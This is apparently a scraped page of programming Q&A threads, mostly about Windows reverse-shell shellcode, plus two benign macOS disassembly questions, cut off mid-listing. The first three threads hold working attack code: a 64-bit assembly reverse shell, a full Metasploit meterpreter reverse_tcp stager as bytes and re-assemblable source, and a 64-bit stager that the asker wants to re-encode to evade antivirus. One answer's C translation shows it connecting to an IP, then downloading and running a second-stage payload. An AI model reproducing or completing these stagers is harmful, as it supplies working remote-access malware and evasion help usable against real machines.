Develop Reference

when writing 64bit reverse shell in assembly got stuck at createrprocessA api

hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code https://pastebin.com/6Ft2jCMX
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push_loop:
push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;
;createprocessA_calling
sub rsp, 0x70
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx ;createprocessA
so at last when i call the createprocessA it got stuck

Why is this assembly program crashing (re-assembled ndisasm output)?

I extracted the assembly code of the windows/meterpreter/reverse_tcp payload with lhost set to 127.0.0.1 and lport set to 443, however after building the assembly program with fasm the program crashes, any ideas as to why?
assembly code:
format PE console
use32
entry start
start:
pusha
mov ebp,esp
xor edx,edx
mov edx,[fs:edx+0x30]
mov edx,[edx+0xc]
mov edx,[edx+0x14]
xor edi,edi
movzx ecx,word [edx+0x26]
mov esi,[edx+0x28]
xor eax,eax
lodsb
cmp al,0x61
jl 0x27
sub al,0x20
ror edi, 0xd
add edi,eax
dec ecx
jnz 0x1e
push edx
push edi
mov edx,[edx+0x10]
mov eax,[edx+0x3c]
add eax,edx
mov eax,[eax+0x78]
test eax,eax
jz 0x8c
add eax,edx
push eax
mov ebx,[eax+0x20]
add ebx,edx
mov ecx,[eax+0x18]
test ecx,ecx
jz 0x8b
xor edi,edi
dec ecx
mov esi,[ebx+ecx*4]
add esi,edx
xor eax,eax
ror edi, 0xd
lodsb
add edi,eax
cmp al,ah
jnz 0x57
add edi,[ebp-0x8]
cmp edi,[ebp+0x24]
jnz 0x4b
pop eax
mov ebx,[eax+0x24]
add ebx,edx
mov cx,[ebx+ecx*2]
mov ebx,[eax+0x1c]
add ebx,edx
mov eax,[ebx+ecx*4]
add eax,edx
mov [esp+0x24],eax
pop ebx
pop ebx
popa
pop ecx
pop edx
push ecx
jmp eax
pop eax
pop edi
pop edx
mov edx,[edx]
jmp 0x15
pop ebp
push dword 0x5f327377
push esp
push dword 0x726774c
mov eax,ebp
call eax
sub esp,eax
push esp
push eax
push dword 0x6b8029
call ebp
push 0xa
push dword 0xf201a8c0
push dword 0xbb010002
mov esi,esp
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
push dword 0xe0df0fea
call ebp
xchg eax,edi
push 0x10
push esi
push edi
push dword 0x6174a599
call ebp
test eax,eax
jz 0xf1
dec dword [esi+0x8]
jnz 0xd8
push 0x0
push 0x4
push esi
push edi
push dword 0x5fc8d902
call ebp
cmp eax, 0x0
jng 0x139
mov esi,[esi]
push 0x40
push esi
push 0x0
push dword 0xe553a458
call ebp
xchg eax,ebx
push ebx
push 0x0
push esi
push ebx
push edi
push dword 0x5fc8d902
call ebp
cmp eax, 0x0
jnl 0x151
pop eax
push 0x0
push eax
push dword 0x300f2f0b
call ebp
push edi
push dword 0x614d6e75
call ebp
pop esi
pop esi
dec dword [esp]
jnz near 0xbc
jmp 0xec
add ebx,eax
sub esi,eax
jnz 0x118
ret
mov ebx,0x56a2b5f0
push 0x0
push ebx
call ebp
I'm compiling and running within a windows 7 environment.
I believe it may be because of the push <single_byte> instructions de-aligning the stack, however I'm not sure and inexperienced with assembly, hopefully someone in the community can help me understand what's causing the crash, thanks.
output of:
python -c 'open("out.bin", "wb").write(b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x58\x20\x01\xd3\x8b\x48\x18\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\xf2\x68\x02\x00\x01\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5")' && ndisasm -b 32 out.bin
00000000 FC cld
00000001 E88F000000 call 0x95
00000006 60 pusha
00000007 89E5 mov ebp,esp
00000009 31D2 xor edx,edx
0000000B 648B5230 mov edx,[fs:edx+0x30]
0000000F 8B520C mov edx,[edx+0xc]
00000012 8B5214 mov edx,[edx+0x14]
00000015 31FF xor edi,edi
00000017 0FB74A26 movzx ecx,word [edx+0x26]
0000001B 8B7228 mov esi,[edx+0x28]
0000001E 31C0 xor eax,eax
00000020 AC lodsb
00000021 3C61 cmp al,0x61
00000023 7C02 jl 0x27
00000025 2C20 sub al,0x20
00000027 C1CF0D ror edi,byte 0xd
0000002A 01C7 add edi,eax
0000002C 49 dec ecx
0000002D 75EF jnz 0x1e
0000002F 52 push edx
00000030 57 push edi
00000031 8B5210 mov edx,[edx+0x10]
00000034 8B423C mov eax,[edx+0x3c]
00000037 01D0 add eax,edx
00000039 8B4078 mov eax,[eax+0x78]
0000003C 85C0 test eax,eax
0000003E 744C jz 0x8c
00000040 01D0 add eax,edx
00000042 50 push eax
00000043 8B5820 mov ebx,[eax+0x20]
00000046 01D3 add ebx,edx
00000048 8B4818 mov ecx,[eax+0x18]
0000004B 85C9 test ecx,ecx
0000004D 743C jz 0x8b
0000004F 31FF xor edi,edi
00000051 49 dec ecx
00000052 8B348B mov esi,[ebx+ecx*4]
00000055 01D6 add esi,edx
00000057 31C0 xor eax,eax
00000059 C1CF0D ror edi,byte 0xd
0000005C AC lodsb
0000005D 01C7 add edi,eax
0000005F 38E0 cmp al,ah
00000061 75F4 jnz 0x57
00000063 037DF8 add edi,[ebp-0x8]
00000066 3B7D24 cmp edi,[ebp+0x24]
00000069 75E0 jnz 0x4b
0000006B 58 pop eax
0000006C 8B5824 mov ebx,[eax+0x24]
0000006F 01D3 add ebx,edx
00000071 668B0C4B mov cx,[ebx+ecx*2]
00000075 8B581C mov ebx,[eax+0x1c]
00000078 01D3 add ebx,edx
0000007A 8B048B mov eax,[ebx+ecx*4]
0000007D 01D0 add eax,edx
0000007F 89442424 mov [esp+0x24],eax
00000083 5B pop ebx
00000084 5B pop ebx
00000085 61 popa
00000086 59 pop ecx
00000087 5A pop edx
00000088 51 push ecx
00000089 FFE0 jmp eax
0000008B 58 pop eax
0000008C 5F pop edi
0000008D 5A pop edx
0000008E 8B12 mov edx,[edx]
00000090 E980FFFFFF jmp 0x15
00000095 5D pop ebp
00000096 6833320000 push dword 0x3233
0000009B 687773325F push dword 0x5f327377
000000A0 54 push esp
000000A1 684C772607 push dword 0x726774c
000000A6 89E8 mov eax,ebp
000000A8 FFD0 call eax
000000AA B890010000 mov eax,0x190
000000AF 29C4 sub esp,eax
000000B1 54 push esp
000000B2 50 push eax
000000B3 6829806B00 push dword 0x6b8029
000000B8 FFD5 call ebp
000000BA 6A0A push byte +0xa
000000BC 68C0A801F2 push dword 0xf201a8c0
000000C1 68020001BB push dword 0xbb010002
000000C6 89E6 mov esi,esp
000000C8 50 push eax
000000C9 50 push eax
000000CA 50 push eax
000000CB 50 push eax
000000CC 40 inc eax
000000CD 50 push eax
000000CE 40 inc eax
000000CF 50 push eax
000000D0 68EA0FDFE0 push dword 0xe0df0fea
000000D5 FFD5 call ebp
000000D7 97 xchg eax,edi
000000D8 6A10 push byte +0x10
000000DA 56 push esi
000000DB 57 push edi
000000DC 6899A57461 push dword 0x6174a599
000000E1 FFD5 call ebp
000000E3 85C0 test eax,eax
000000E5 740A jz 0xf1
000000E7 FF4E08 dec dword [esi+0x8]
000000EA 75EC jnz 0xd8
000000EC E867000000 call 0x158
000000F1 6A00 push byte +0x0
000000F3 6A04 push byte +0x4
000000F5 56 push esi
000000F6 57 push edi
000000F7 6802D9C85F push dword 0x5fc8d902
000000FC FFD5 call ebp
000000FE 83F800 cmp eax,byte +0x0
00000101 7E36 jng 0x139
00000103 8B36 mov esi,[esi]
00000105 6A40 push byte +0x40
00000107 6800100000 push dword 0x1000
0000010C 56 push esi
0000010D 6A00 push byte +0x0
0000010F 6858A453E5 push dword 0xe553a458
00000114 FFD5 call ebp
00000116 93 xchg eax,ebx
00000117 53 push ebx
00000118 6A00 push byte +0x0
0000011A 56 push esi
0000011B 53 push ebx
0000011C 57 push edi
0000011D 6802D9C85F push dword 0x5fc8d902
00000122 FFD5 call ebp
00000124 83F800 cmp eax,byte +0x0
00000127 7D28 jnl 0x151
00000129 58 pop eax
0000012A 6800400000 push dword 0x4000
0000012F 6A00 push byte +0x0
00000131 50 push eax
00000132 680B2F0F30 push dword 0x300f2f0b
00000137 FFD5 call ebp
00000139 57 push edi
0000013A 68756E4D61 push dword 0x614d6e75
0000013F FFD5 call ebp
00000141 5E pop esi
00000142 5E pop esi
00000143 FF0C24 dec dword [esp]
00000146 0F8570FFFFFF jnz near 0xbc
0000014C E99BFFFFFF jmp 0xec
00000151 01C3 add ebx,eax
00000153 29C6 sub esi,eax
00000155 75C1 jnz 0x118
00000157 C3 ret
00000158 BBF0B5A256 mov ebx,0x56a2b5f0
0000015D 6A00 push byte +0x0
0000015F 53 push ebx
00000160 FFD5 call ebp
gdb output:
C:\Users\localbox\Desktop>gdb msf_shellcode.exe
GNU gdb (GDB) 7.6.1
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "mingw32".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from C:\Users\localbox\Desktop\msf_shellcode.exe...(no debugging
symbols found)...done.
(gdb) run
Starting program: C:\Users\localbox\Desktop/msf_shellcode.exe
[New Thread 2336.0xb00]
Program received signal SIGSEGV, Segmentation fault.
0x0000001e in ?? ()
(gdb) x/32xw $esp
0x6ff6c: 0x00000000 0x00000000 0x0006ff94 0x0006ff8c
0x6ff7c: 0x7ffd5000 0x00401000 0x00000000 0x772fef9a
0x6ff8c: 0x772fefac 0x7ffd5000 0x0006ffd4 0x77b33628
0x6ff9c: 0x7ffd5000 0x778d44b6 0x00000000 0x00000000
0x6ffac: 0x7ffd5000 0x00000000 0x00000000 0x00000000
0x6ffbc: 0x0006ffa0 0x00000000 0xffffffff 0x77aee325
0x6ffcc: 0x0039b51a 0x00000000 0x0006ffec 0x77b335fb
0x6ffdc: 0x00401000 0x7ffd5000 0x00000000 0x00000000
(gdb) info registers
eax 0x4d 77
ecx 0x23 35
edx 0x1f1ae8 2038504
ebx 0x7ffd5000 2147307520
esp 0x6ff6c 0x6ff6c
ebp 0x6ff6c 0x6ff6c
esi 0x1f1929 2038057
edi 0x4d 77
eip 0x1e 0x1e
eflags 0x10202 [ IF RF ]
cs 0x1b 27
ss 0x23 35
ds 0x23 35
es 0x23 35
fs 0x3b 59
gs 0x0 0

You crashed with EIP=0x1e. That's because you told FASM to jump there, to that absolute address, with jnz 0x1e. That page of memory is not mapped into your user-space process, so code-fetch causes an "invalid" page fault, and consequently the OS stops your process.
In the ndisasm output, you can see that 1E is the 0000001E 31C0 xor eax,eax line. That's where that branch is supposed to jump (if taken). ndisasm is disassembling as if the block of machine code was loaded starting at absolute address 0, or you could say it's using relative addresses.
(jcc rel8 is of course in the machine code a relative jump; the original machine code is position independent. So is yours, except that jnz 0x1e tells FASM to figure out the relative offset necessary to reach EIP=0x1e from wherever this instruction will end up.)
Use a disassembler that uses labels for branch targets to make asm source you can actually re-assemble, like Agner Fog's objconv. It can disassemble into NASM/YASM, MASM, or GAS (.intel_syntax noprefix) syntax. NASM and FASM are very close in syntax, and that's what ndisasm make.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?

your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

Disassembling CGContextReplacePathWithShapePath()?

I am beginner at dis-assembly. Below is the disassembly of CGContextReplacePathWithShapePath from IDA pro. I am trying to figure out the parameters to the routine.
Any help is highly appreciated. Also please post some pointers/hints on how to attack the dis-assembly.
__text:00024D1F ; =============== S U B R O U T I N E =======================================
__text:00024D1F
__text:00024D1F ; Attributes: bp-based frame
__text:00024D1F
__text:00024D1F public _CGContextReplacePathWithShapePath
__text:00024D1F _CGContextReplacePathWithShapePath proc near
__text:00024D1F
__text:00024D1F var_2C = dword ptr -2Ch
__text:00024D1F var_20 = dword ptr -20h
__text:00024D1F var_1C = dword ptr -1Ch
__text:00024D1F arg_0 = dword ptr 8
__text:00024D1F arg_4 = dword ptr 0Ch
__text:00024D1F
__text:00024D1F push ebp
__text:00024D20 mov ebp, esp
__text:00024D22 push edi
__text:00024D23 push esi
__text:00024D24 push ebx
__text:00024D25 sub esp, 3Ch
__text:00024D28 call $+5
__text:00024D2D pop ebx
__text:00024D2E mov esi, [ebp+arg_0]
__text:00024D31 test esi, esi
__text:00024D33 jz short loc_24D3E
__text:00024D35 cmp dword ptr [esi+8], 43545854h
__text:00024D3C jz short loc_24D5F
__text:00024D3E
__text:00024D3E loc_24D3E: ; CODE XREF: _CGContextReplacePathWithShapePath+14j
__text:00024D3E mov [esp+8], esi
__text:00024D42 lea eax, (___func___26084 - 24D2Dh)[ebx] ; "CGContextReplacePathWithShapePath"
__text:00024D48 mov [esp+4], eax
__text:00024D4C lea eax, (aSInvalidContex - 24D2Dh)[ebx] ; "%s: invalid context %p"
__text:00024D52 mov [esp], eax
__text:00024D55 call _CGPostError
__text:00024D5A jmp loc_24DF2
__text:00024D5F ; ---------------------------------------------------------------------------
__text:00024D5F
__text:00024D5F loc_24D5F: ; CODE XREF: _CGContextReplacePathWithShapePath+1Dj
__text:00024D5F mov eax, [esi+58h]
__text:00024D62 test eax, eax
__text:00024D64 jz short loc_24D75
__text:00024D66 mov [esp], eax
__text:00024D69 call _CGPathRelease
__text:00024D6E mov dword ptr [esi+58h], 0
__text:00024D75
__text:00024D75 loc_24D75: ; CODE XREF: _CGContextReplacePathWithShapePath+45j
__text:00024D75 mov eax, [ebp+arg_4]
__text:00024D78 mov [esp], eax
__text:00024D7B call _CGSRegionPathEnumerator
__text:00024D80 mov edi, eax
__text:00024D82 xor ebx, ebx
__text:00024D84 lea eax, [ebp+var_20]
__text:00024D87 mov [ebp+var_2C], eax
__text:00024D8A jmp short loc_24DCA
__text:00024D8C ; ---------------------------------------------------------------------------
__text:00024D8C
__text:00024D8C loc_24D8C: ; CODE XREF: _CGContextReplacePathWithShapePath+BDj
__text:00024D8C jge short loc_24DB4
__text:00024D8E inc ebx
__text:00024D8F cmp ebx, 1
__text:00024D92 jz short loc_24D9C
__text:00024D94 mov [esp], esi
__text:00024D97 call _CGContextClosePath
__text:00024D9C
__text:00024D9C loc_24D9C: ; CODE XREF: _CGContextReplacePathWithShapePath+73j
__text:00024D9C mov eax, [ebp+var_1C]
__text:00024D9F mov [esp+8], eax
__text:00024DA3 mov eax, [ebp+var_20]
__text:00024DA6 mov [esp+4], eax
__text:00024DAA mov [esp], esi
__text:00024DAD call _CGContextMoveToPoint
__text:00024DB2 jmp short loc_24DCA
__text:00024DB4 ; ---------------------------------------------------------------------------
__text:00024DB4
__text:00024DB4 loc_24DB4: ; CODE XREF: _CGContextReplacePathWithShapePath:loc_24D8Cj
__text:00024DB4 mov eax, [ebp+var_1C]
__text:00024DB7 mov [esp+8], eax
__text:00024DBB mov eax, [ebp+var_20]
__text:00024DBE mov [esp+4], eax
__text:00024DC2 mov [esp], esi
__text:00024DC5 call _CGContextAddLineToPoint
__text:00024DCA
__text:00024DCA loc_24DCA: ; CODE XREF: _CGContextReplacePathWithShapePath+6Bj
__text:00024DCA ; _CGContextReplacePathWithShapePath+93j
__text:00024DCA mov eax, [ebp+var_2C]
__text:00024DCD mov [esp+4], eax
__text:00024DD1 mov [esp], edi
__text:00024DD4 call _CGSNextPoint
__text:00024DD9 cmp eax, 0
__text:00024DDC jnz short loc_24D8C
__text:00024DDE test ebx, ebx
__text:00024DE0 jz short loc_24DEA
__text:00024DE2 mov [esp], esi
__text:00024DE5 call _CGContextClosePath
__text:00024DEA
__text:00024DEA loc_24DEA: ; CODE XREF: _CGContextReplacePathWithShapePath+C1j
__text:00024DEA mov [esp], edi
__text:00024DED call _CGSReleaseRegionEnumerator
__text:00024DF2
__text:00024DF2 loc_24DF2: ; CODE XREF: _CGContextReplacePathWithShapePath+3Bj
__text:00024DF2 add esp, 3Ch
__text:00024DF5 pop ebx
__text:00024DF6 pop esi
__text:00024DF7 pop edi
__text:00024DF8 leave
__text:00024DF9 retn
__text:00024DF9 _CGContextReplacePathWithShapePath endp

The first parameter is a context parameter of some sort.
The function checks to see if it's NULL and in that case jumps to loc_24D3E (where you can see it calls an error function _CGPostError with the format string "%s: invalid context %p"). BTW: Right after it checks a magic value in the context (at context+8) to see if it is valid otherwise it exits through the same error path. The magic value43545854h is CTXT as chars btw.
__text:00024D2E mov esi, [ebp+arg_0]
__text:00024D31 test esi, esi
__text:00024D33 jz short loc_24D3E
As for the second parameter, it looks to be some kind of path as it is used as the sole parameter to CGSRegionPathEnumerator.
__text:00024D75 mov eax, [ebp+arg_4]
__text:00024D78 mov [esp], eax
__text:00024D7B call _CGSRegionPathEnumerator
In C the function would look something like this:
void CGContextReplacePathWithShapePath(Context* context, Path* path) {
if(context == NULL || context->magic != 0x43545854) {
CGPostError("%s: invalid context %p", "CGContextReplacePathWithShapePath", context);
return;
}
// loc_24D5F
if (context->path != NULL) {
CGPathRelease(context->path);
context->path = NULL;
}
// loc_24D75
RegionPathEnumerator* rpe = CGSRegionPathEnumerator(path);
// ....
}

Reversing of _PrepareMenuWindow() subroutine

Can some one help me with reversing of _PrepareMenuWindow() subroutine?
I am trying to find the signature of the method.
__text:000639A7 _PrepareMenuWindow proc near ; CODE XREF: DrawTheMenu(MenuSelectData *,__CFArray **,uchar,uchar *)+274p
__text:000639A7 ; PopUpMenuSelectCore(MenuData *,Point,double,Point,ushort,uint,Rect const*,ushort,ulong,Rect const*,Rect const*,__CFString const*,OpaqueMenuRef **,ushort *)+528p
__text:000639A7
__text:000639A7 var_44 = dword ptr -44h
__text:000639A7 var_40 = dword ptr -40h
__text:000639A7 var_3C = dword ptr -3Ch
__text:000639A7 var_34 = dword ptr -34h
__text:000639A7 var_30 = dword ptr -30h
__text:000639A7 var_2C = dword ptr -2Ch
__text:000639A7 var_28 = dword ptr -28h
__text:000639A7 var_24 = word ptr -24h
__text:000639A7 var_20 = dword ptr -20h
__text:000639A7 var_1A = word ptr -1Ah
__text:000639A7 arg_0 = dword ptr 8
__text:000639A7 arg_4 = dword ptr 0Ch
__text:000639A7 arg_8 = dword ptr 10h
__text:000639A7
__text:000639A7 push ebp
__text:000639A8 mov ebp, esp
__text:000639AA push edi
__text:000639AB push esi
__text:000639AC push ebx
__text:000639AD sub esp, 5Ch
__text:000639B0 xor edi, edi
__text:000639B2 mov eax, [ebp+arg_0]
__text:000639B5 test eax, eax
__text:000639B7 jz short loc_639C6
__text:000639B9 mov eax, [ebp+arg_0]
__text:000639BC mov [esp], eax
__text:000639BF call __ZNK8HIObject13GetEncodedRefEv ; HIObject::GetEncodedRef(void)
__text:000639C4 mov edi, eax
__text:000639C6
__text:000639C6 loc_639C6: ; CODE XREF: _PrepareMenuWindow+10j
__text:000639C6 mov ecx, [ebp+arg_4]
__text:000639C9 mov eax, [ecx]
__text:000639CB mov edx, [ecx+4]
__text:000639CE mov [ebp+var_2C], eax
__text:000639D1 mov [ebp+var_28], edx
__text:000639D4 lea eax, [ebp+var_1A]
__text:000639D7 mov [ebp+var_40], eax
__text:000639DA mov [esp+4], eax
__text:000639DE mov [esp], edi
__text:000639E1 call _GetMenuType
__text:000639E6 mov dword ptr [esp+4], 0
__text:000639EE mov [esp], edi
__text:000639F1 call _IsMenuItemEnabled
__text:000639F6 movzx edx, [ebp+var_1A]
__text:000639FA or dh, 1
__text:000639FD test al, al
__text:000639FF movzx ebx, [ebp+var_1A]
__text:00063A03 cmovz ebx, edx
__text:00063A06 mov [ebp+var_1A], bx
__text:00063A0A mov eax, [ebp+arg_8]
__text:00063A0D mov [esp+0Ch], eax
__text:00063A11 lea ecx, [ebp+var_2C]
__text:00063A14 mov [ebp+var_44], ecx
__text:00063A17 mov [esp+8], ecx
__text:00063A1B mov eax, [ebp+arg_4]
__text:00063A1E mov [esp+4], eax
__text:00063A22 mov [esp], edi
__text:00063A25 call __AddOpenMenu
__text:00063A2A mov ecx, [ebp+var_44]
__text:00063A2D mov [esp], ecx
__text:00063A30 call _EmptyRect
__text:00063A35 test al, al
__text:00063A37 jnz loc_63B94
__text:00063A3D mov [esp], edi
__text:00063A40 call __Z11GetMenuDataP13OpaqueMenuRef ; GetMenuData(OpaqueMenuRef *)
__text:00063A45 mov [ebp+var_3C], eax
__text:00063A48 call _NewRgn
__text:00063A4D mov esi, eax
__text:00063A4F test eax, eax
__text:00063A51 jz loc_63BDD
__text:00063A57 movzx ebx, bx
__text:00063A5A mov eax, [ebp+var_3C]
__text:00063A5D mov eax, [eax+40h]
__text:00063A60 test eax, eax
__text:00063A62 jnz loc_63B23
__text:00063A68 mov [ebp+var_1A], 0
__text:00063A6E mov eax, [ebp+var_2C]
__text:00063A71 mov edx, [ebp+var_28]
__text:00063A74 mov [ebp+var_34], eax
__text:00063A77 mov [ebp+var_30], edx
__text:00063A7A mov ecx, [ebp+var_40]
__text:00063A7D mov [esp+10h], ecx
__text:00063A81 mov dword ptr [esp+0Ch], 0
__text:00063A89 lea eax, [ebp+var_34]
__text:00063A8C mov [esp+8], eax
